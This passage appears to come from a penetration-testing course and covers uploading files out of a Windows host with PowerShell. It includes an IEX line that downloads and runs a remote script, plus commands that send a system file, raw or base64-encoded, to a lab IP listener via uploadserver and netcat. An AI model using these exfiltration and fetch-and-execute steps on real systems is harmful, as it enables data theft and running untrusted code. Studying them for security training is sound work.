PowerShell doesn't have a built-in function for upload operations, but we can use Invoke-WebRequest or Invoke-RestMethod to build our upload function. We'll also need a web server that accepts uploads, which is not a default option in most common webserver utilities.

For our web server, we can use uploadserver, an extended module of the Python HTTP.server module, which includes a file upload page. Let's install it and start the webserver.

Installing a Configured WebServer with Upload

pip3 install uploadserver

python3 -m uploadserver

Now we can use a PowerShell script PSUpload.ps1 which uses Invoke-RestMethod to perform the upload operations. The script accepts two parameters -File, which we use to specify the file path, and -Uri, the server URL where we'll upload our file.

PowerShell Script to Upload a File to Python Upload Server

IEX(New-Object Net.WebClient).DownloadString('<https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1>')

Invoke-FileUpload -Uri <http://192.168.49.128:8000/upload> -File C:\\Windows\\System32\\drivers\\etc\\hosts

PowerShell Base64 Web Upload

Another way to use PowerShell and base64 encoded files for upload operations is by using Invoke-WebRequest or Invoke-RestMethod together with Netcat. We use Netcat to listen in on a port we specify and send the file as a POST request. Finally, we copy the output and use the base64 decode function to convert the base64 string into a file.

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\\Windows\\System32\\drivers\\etc\\hosts' -Encoding Byte))

Invoke-WebRequest -Uri <http://192.168.49.128:8000/> -Method POST -Body $b64

We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.

nc -lvnp 8000

echo <base64> | base64 -d -w 0 > hosts